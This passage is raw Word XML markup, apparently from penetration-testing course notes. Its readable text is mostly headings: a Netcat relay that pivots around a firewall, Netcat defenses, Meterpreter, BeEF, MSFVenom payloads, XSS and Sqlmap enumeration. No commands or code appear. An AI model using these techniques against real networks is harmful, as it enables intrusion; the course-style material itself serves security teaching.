              <w:t>The attacker circumvents the firewall by using the victim as a pivot point with Netcat. Requires a name pipe on the pivot system.</w:t>
            </w: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Make a Netcat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Defense</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="568DC5BB"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Defense against Netcat depends on the mode in which it is used.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65F1903C"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To summarize, preparation step involves:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07E372EE"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Data transfer: know what is running on your systems.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C7F094D" w14:textId="3B8CABC2"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Port scanner: close all unused ports</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6204C59F"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lastRenderedPageBreak/>
              <w:t>Connecting to open ports: close all unused ports.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="707635AF"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Backdoors: Know what is running on your systems.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23F2D32D" w14:textId="3392BBCE" w:rsidR="00E1037D" w:rsidRP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Relays: carefully architect your network with layered security so an attacker cannot relay around your critical filtering capabilities (internal network firewalls, private VLANs, network isolation design.</w:t>
            </w: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Closing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0857DF25" w14:textId="56855E5F"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Netcat</w:t>
            </w:r>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6B90A501" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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40E372C9" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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2C9F4C22" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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247991D7" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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20C79C2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Metepreter Features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BE4FC5F" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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4D9C58B8" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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74304E2D" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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779D6CBB" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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559E7D17" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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62E70993" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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49D4ABE6" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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3260DF2" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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07839F9F" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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(BeEF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F50541C" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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559F26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Building Payloads - Metasploit MSFVenom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="368408C3" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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1CED585" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E7ACD6" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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3258271A" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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2FB4CA7A" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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2912A835" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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67C9CA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than a Web Vunerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E8A1DBE" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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6368ED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9F8E2FC" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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7DFA0418" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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6A2A4B94" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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3D9D9AF6" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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0D0CA124" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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77777777"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What can an Attacker Do With XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B648547" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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002E92EF" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0540B5DC" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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4C39A269" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68D63FD7" w14:textId="0F57C97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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A7D0651" w14:textId="1EF7B8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1BD76099" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A186A23" w14:textId="35D796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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D414242" w14:textId="207BB5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6DE158B3" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30A1985D" w14:textId="2AAD95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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DA698A6" w14:textId="44E71B9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011862F3" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7914BBCB" w14:textId="604B9E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2B7542D3" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C9157AB" w14:textId="711A81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1F2266CB" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F98BF8C" w14:textId="4FF9EA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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F00608B" w14:textId="20D923A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08914722" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05CE4906" w14:textId="41A9E60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Sqlmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55D42566" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46AB9910" w14:textId="4538EAD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73609608" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4862A510" w14:textId="2DEB14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Importan Sqlmap Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B633C1E" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7906148D" w14:textId="339751D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15C749E8" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B68AF4F" w14:textId="2E7E70E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Sqlmap Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A1A5405" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F163A5A" w14:textId="4F2C77D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25B29BC" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="196B0D8B" w14:textId="43BE38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SQL Does Not Escape Vunerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AF3532E" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23CAE2B4" w14:textId="77FEEDF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1D97D9E6" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E5CF7A6" w14:textId="737D9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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="146E1619" w14:textId="09FBFBA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113D502A" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="658EFDC8" w14:textId="3376944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39AAC875" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67D9126F" w14:textId="22F287F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35D28C36" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78390537" w14:textId="67222E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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FD76271" w14:textId="4D57EFF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ED36305" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6959C822" w14:textId="256A0F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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57C9E080" w14:textId="419CD42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77C6690C" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E8A87F7" w14:textId="70F078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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="438EDDB4" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ADC2D76" w14:textId="3882DF3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41E86FB5" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11B8EF64" w14:textId="543CEC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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56DD47D9" w14:textId="0FB90F2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4D8B185B" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D12458E" w14:textId="40373C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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EBE7ECB" w14:textId="498809EA"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6B4F4DEB" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C3232CC" w14:textId="22180B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5CD3B0D9" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40344EAC" w14:textId="02F1245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92</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="2481B584" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C6D24F5" w14:textId="0F70DA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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C771A3D" w14:textId="780ABD6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2DC286C5" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F1D5E99" w14:textId="777BE3C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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02E4D363" w14:textId="4F11A01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76E6A574" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AB8F32F" w14:textId="66DD28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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="345915CD" w14:textId="72378A9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95</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="0EE382CF" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DBA5705" w14:textId="40C254D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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
